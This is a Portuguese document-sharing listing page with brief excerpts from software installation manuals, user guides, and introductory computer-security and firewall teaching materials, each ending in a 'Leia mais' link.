Procedimentos para Instalação do Sisloc Procedimentos para Instalação do Sisloc Sumário: 1. Informações Gerais... 3 2. Instalação do Sisloc... 3 Passo a passo... 3 3. Instalação da base de dados Sisloc... 16 Passo a passo... 16 4. Instalação

Leia mais

Mercado Eletrônico Instalação e Atualização MEConnect2

Mercado Eletrônico Instalação e Atualização MEConnect2 Manual de Usuário da Plataforma de compras do Grupo José de Mello - Mercado Eletrônico Instalação e Atualização MEConnect2 1 Índice 1. Introdução... 3 2. Visão Geral... 3 3. Instalação e Atualização...

Leia mais

Em informática, um vírus de computador é um software malicioso que vem sendo desenvolvido por programadores que, tal como um vírus biológico, infecta

Em informática, um vírus de computador é um software malicioso que vem sendo desenvolvido por programadores que, tal como um vírus biológico, infecta Em informática, um vírus de computador é um software malicioso que vem sendo desenvolvido por programadores que, tal como um vírus biológico, infecta o sistema, faz cópias de si mesmo e tenta se espalhar

Leia mais

MANUAL DE MEMBRO COMUNIDADE DO AMIGO

MANUAL DE MEMBRO COMUNIDADE DO AMIGO SUMÁRIO Efetuando o Login na comunidade... 3 Esqueceu sua senha?... 3 Página Principal... 4 Detalhando o item Configurações... 5 Alterar Foto... 5 Alterar Senha... 5 Dados Pessoais... 6 Configurações de

Leia mais

Professor: Macêdo Firmino Disciplina: Sistemas Operacionais de Rede

Professor: Macêdo Firmino Disciplina: Sistemas Operacionais de Rede Professor: Macêdo Firmino Disciplina: Sistemas Operacionais de Rede O servidor de arquivos fornece um ponto centralizado na rede para armazenamento e compartilhamento de arquivos entre os usuários. Quando

Leia mais

http://aurelio.net/vim/vim-basico.txt Entrar neste site/arquivo e estudar esse aplicativo Prof. Ricardo César de Carvalho

http://aurelio.net/vim/vim-basico.txt Entrar neste site/arquivo e estudar esse aplicativo Prof. Ricardo César de Carvalho vi http://aurelio.net/vim/vim-basico.txt Entrar neste site/arquivo e estudar esse aplicativo Administração de Redes de Computadores Resumo de Serviços em Rede Linux Controlador de Domínio Servidor DNS

Leia mais

Sistemas para Internet 06 Ataques na Internet

Sistemas para Internet 06 Ataques na Internet Sistemas para Internet 06 Ataques na Internet Uma visão geral dos ataques listados na Cartilha de Segurança para Internet do CGI Comitê Gestor da Internet Componente Curricular: Bases da Internet Professor:

Leia mais

Gerenciador Eletrônico de Documentos (GED) (Manual de Instalação)

Gerenciador Eletrônico de Documentos (GED) (Manual de Instalação) Gerenciador Eletrônico de Documentos (GED) (Manual de Instalação) Quantico Sistemas de Informação Ltda. 1 / 12 A. Histórico de Alterações Histórico de Alterações Versão Responsáveis Objetivo Solicitante

Leia mais

Ferramentas para Desenvolvimento Web

Ferramentas para Desenvolvimento Web Ferramentas para Desenvolvimento Web Profa. Dra. Joyce Martins Mendes Battaglia Mini Currículo Bel. em Ciência da Computação - Unib Mestre e doutora em Eng. Elétrica USP Professora /Coordenadora Pesquisadora

Leia mais

Manual de Operações Básicas. Thiago Passamani

Manual de Operações Básicas. Thiago Passamani Manual de Operações Básicas Thiago Passamani 1 - Entrando e saindo do sistema O Zimbra Suíte de Colaboração é um software de correio eletrônico open source com suporte para e-mail, contatos, calendário

Leia mais

Sistema de Gerenciamento de Arquivos (SGA) (Manual de Instalação)

Sistema de Gerenciamento de Arquivos (SGA) (Manual de Instalação) Sistema de Gerenciamento de Arquivos (SGA) (Manual de Instalação) Quantico Sistemas de Informação Ltda. 1 / 12 A. Histórico de Alterações Histórico de Alterações Versão Responsáveis Objetivo Solicitante

Leia mais

SISTEMA OPERACIONAL - WINDOWS

SISTEMA OPERACIONAL - WINDOWS MANUAL PROTECT Versão R15 SISTEMA OPERACIONAL - WINDOWS Copyright GVT 2015 www.gvtprotect.com.br 1 1 Índice 1 Índice... 2 2 GVT PROTECT... 3 2.1 REQUISITOS MÍNIMOS DE SISTEMA... 3 2.2 SISTEMAS OPERACIONAIS

Leia mais

SISTEMA OPERACIONAL MAC OS

SISTEMA OPERACIONAL MAC OS MANUAL PROTECT Versão R15 SISTEMA OPERACIONAL MAC OS Copyright GVT 2015 www.gvtprotect.com.br 1 1 Índice 1 Índice... 2 2 GVT PROTECT... 3 2.1 Requisitos Mínimos De Sistema... 3 2.2 Sistemas Operacionais

Leia mais

Prefeitura do Campus USP de Pirassununga Seção Técnica de Informática

Prefeitura do Campus USP de Pirassununga Seção Técnica de Informática CARTILHA DE INFORMÁTICA SEÇÃO TÉCNICA DE INFORMÁTICA PUSP-P Nº 002 - SETEMBRO/2014 TEMA: GOLPES POR EMAIL "NA DÚVIDA NÃO CLIQUE" RELEMBRANDO: Na cartilha nº 001 lançada em Julho de 2014 escrevemos dicas

Leia mais

Cartilha de Segurança para Internet

Cartilha de Segurança para Internet Comitê Gestor da Internet no Brasil Cartilha de Segurança para Internet Parte VII: Incidentes de Segurança e Uso Abusivo da Rede Versão 3.1 2006 CERT.br Centro de Estudos, Resposta e Tratamento de Incidentes

Leia mais

WebMail --------------------------------------------------------------------------------------------------------------- Manual do cliente

WebMail --------------------------------------------------------------------------------------------------------------- Manual do cliente WebMail --------------------------------------------------------------------------------------------------------------- Manual do cliente www.plugin.com.br 1 ÍNDICE Prefácio...3 Sobre Este Manual... 3

Leia mais

Solução de acessibilidade. Guia do administrador

Solução de acessibilidade. Guia do administrador Solução de acessibilidade Guia do administrador Julho de 2014 www.lexmark.com Conteúdo 2 Conteúdo Visão geral...3 Configurando o aplicativo...4 Configurando o acesso do usuário...4 Desativando funções

Leia mais

Configurações Básicas para o e-sus Hospitalar

Configurações Básicas para o e-sus Hospitalar Configurações Básicas para o e-sus Hospitalar Guia do Usuário - 15/12/2014 Sumário 1 Introdução... 2 2 Objetivo... 3 3 Configuração e Execução dos Controles ActiveX... 4 3.1 ActiveX... 4 3.2 Install.bat...

Leia mais

Segurança da Internet no Brasil e Atuação do CERT.br

Segurança da Internet no Brasil e Atuação do CERT.br Segurança da Internet no Brasil e Atuação do CERT.br Aritana Pinheiro Falconi falconi@cert.br Centro de Estudos, Resposta e Tratamento de Incidentes de Segurança no Brasil Núcleo de Informação e Coordenação

Leia mais

Firewall. Qual a utilidade em instalar um firewall pessoal?

Firewall. Qual a utilidade em instalar um firewall pessoal? Firewall Significado: Firewall em português é o mesmo que parede cortafogo, um tipo de parede, utilizada principalmente em prédios, que contém o fogo em casos de incêndio. O firewall da informática faz

Leia mais

PROCEDIMENTOS PARA UTILIZAÇÃO DE NOVA VERSÃO DO JAVA

PROCEDIMENTOS PARA UTILIZAÇÃO DE NOVA VERSÃO DO JAVA 1 PROCEDIMENTOS PARA UTILIZAÇÃO DE NOVA VERSÃO DO JAVA A partir da atualização da versão do programa JAVA ( 7 Update 51) que ocorreu nas máquinas dos usuários em Janeiro/2014, algumas alterações de segurança

Leia mais

Política de privacidade do Norton Community Watch

Política de privacidade do Norton Community Watch Política de privacidade do Norton Community Watch Data de início: 5 de agosto de 1999 Última atualização: 16 de abril de 2010 O que é o Norton Community Watch? O Norton Community Watch permite que os usuários

Leia mais

Renovação Online de certificados digitais A3 (Voucher)

Renovação Online de certificados digitais A3 (Voucher) Renovação Online de certificados digitais A3 (Voucher) Todos os direitos reservados. Imprensa Oficial do Estado S.A. 2012 página 1 de 19 Requisitos para a Renovação Certificados A3 Em Cartão/Token (Navegador

Leia mais

Manual - Gemelo Backup Online WEB

Manual - Gemelo Backup Online WEB Manual - Gemelo Backup Online WEB É um disco virtual que permite acessar seus dados de qualquer lugar através da Internet. Acesso A Gemelo Storage Solutions e enviará um e-mail confirmando que você é usuário

Leia mais

SISTEMAS OPERACIONAIS LIVRES. Professor Carlos Muniz

SISTEMAS OPERACIONAIS LIVRES. Professor Carlos Muniz SISTEMAS OPERACIONAIS LIVRES Agendar uma tarefa Você deve estar com logon de administrador para executar essas etapas. Se não tiver efetuado logon como administrador, você só poderá alterar as configurações

Leia mais

SISNOR WEB SISTEMA INTEGRADO DE APOIO À FISCALIZAÇÃO DOS SERVIÇOS NOTARIAIS E DE REGISTRO CERTIFICADO DIGITAL

SISNOR WEB SISTEMA INTEGRADO DE APOIO À FISCALIZAÇÃO DOS SERVIÇOS NOTARIAIS E DE REGISTRO CERTIFICADO DIGITAL SISNOR WEB SISTEMA INTEGRADO DE APOIO À FISCALIZAÇÃO DOS SERVIÇOS NOTARIAIS E DE REGISTRO CERTIFICADO DIGITAL Manual de Usuário Versão 1.0 1 Histórico de Revisões: Versão 1.0 06/05/2015: Raphael Pena Cavalcanti

Leia mais

"Manual de Acesso ao Moodle - Discente" 2014

Manual de Acesso ao Moodle - Discente 2014 "Manual de Acesso ao Moodle - Discente" 2014 Para acessar a plataforma, acesse: http://www.fem.com.br/moodle. A página inicial da plataforma é a que segue abaixo: Para fazer o login, clique no link Acesso

Leia mais

Manual de Instalação Mozilla Thunderbird no DATASUS - RJ

Manual de Instalação Mozilla Thunderbird no DATASUS - RJ Manual de Instalação Mozilla Thunderbird no DATASUS - RJ Conteúdo Sobre Este Documento......2 Conhecimentos Desejados...2 Organização deste Documento...2 Sobre o Mozilla Thunderbird...2 1.Pré-requisitos

Leia mais

Via Prática Firewall Box Gateway O acesso à Internet

Via Prática Firewall Box Gateway O acesso à Internet FIREWALL BOX Via Prática Firewall Box Gateway O acesso à Internet Via Prática Firewall Box Gateway pode tornar sua rede mais confiável, otimizar sua largura de banda e ajudar você a controlar o que está

Leia mais

Evolução dos Problemas de Segurança e Formas de Proteção

Evolução dos Problemas de Segurança e Formas de Proteção Evolução dos Problemas de Segurança e Formas de Proteção Núcleo de Informação e Coordenação do Ponto.br Nic.br http://www.nic.br/ Centro de Estudos, Resposta e Tratamento de Incidentes de Segurança no

Leia mais

Firewall. Professor: João Paulo de Brito Gonçalves Disciplina: Serviços de Redes. Campus Cachoeiro Curso Técnico em Informática

Firewall. Professor: João Paulo de Brito Gonçalves Disciplina: Serviços de Redes. Campus Cachoeiro Curso Técnico em Informática Firewall Professor: João Paulo de Brito Gonçalves Disciplina: Serviços de Redes Campus Cachoeiro Curso Técnico em Informática Firewall (definições) Por que do nome firewall? Antigamente, quando as casas

Leia mais

Procedimentos para Instalação do SISLOC

Procedimentos para Instalação do SISLOC Procedimentos para Instalação do SISLOC Sumário 1. Informações Gerais...3 2. Instalação do SISLOC...3 Passo a passo...3 3. Instalação da Base de Dados SISLOC... 11 Passo a passo... 11 4. Instalação de

Leia mais

13/3/2012. Prof. Flávio Ferry DIE UFPI - 2012

13/3/2012. Prof. Flávio Ferry DIE UFPI - 2012 Prof. Flávio Ferry DIE UFPI - 2012 Pequeno programa criado com a intenção de provocar danos a dados ou lentidão de processamento. Razão do nome = Estes programas são feitos para serem auto instaláveis

Leia mais

Segurança na internet

Segurança na internet Segurança na internet Perigos da internet Cyberbullying Uso da internet para praticar ofensas e humilhações a alguém de forma constante Discriminação Quando há publicação de mensagem ou imagem preconceituosas

Leia mais

Serviços de TIC Soluções e demandas

Serviços de TIC Soluções e demandas Serviços de TIC Soluções e demandas Superintendência de Governança Eletrônica e de Tecnologia da Informação e Comunicação (SeTIC/UFSC) 16/07/2015 CSS/SeTIC 1 Agenda SeTIC Apresentação dos serviços, por

Leia mais

Microsoft Internet Explorer. Browser/navegador/paginador

Microsoft Internet Explorer. Browser/navegador/paginador Microsoft Internet Explorer Browser/navegador/paginador Browser (Navegador) É um programa que habilita seus usuários a interagir com documentos HTML hospedados em um servidor web. São programas para navegar.

Leia mais

Este artigo abaixo foi produzido originalmente para a Network Core Wiki. Reproduzo-a aqui na íntegra. Publicado originalmente em 07/12/2007.

Este artigo abaixo foi produzido originalmente para a Network Core Wiki. Reproduzo-a aqui na íntegra. Publicado originalmente em 07/12/2007. Vírus no Linux? Este artigo abaixo foi produzido originalmente para a Network Core Wiki. Reproduzo-a aqui na íntegra. Publicado originalmente em 07/12/2007. Interface de uma distribuição Linux Uma das

Leia mais

NFe Nota Fiscal Eletronica

NFe Nota Fiscal Eletronica 1 NFe Nota Fiscal Eletronica Introdução O NFe Tron, apesar de ser um sistema complexo, possui um método simples de instalação, configurando todos os elementos necessários para o funcionamento básico do

Leia mais

Nettion Security & Net View. Mais que um software, gestão em Internet.

Nettion Security & Net View. Mais que um software, gestão em Internet. Nettion Security & Net View Mais que um software, gestão em Internet. Net View & Nettion Security Mais que um software, gestão em Internet. A Net View e a Nettion Security Software se uniram para suprir

Leia mais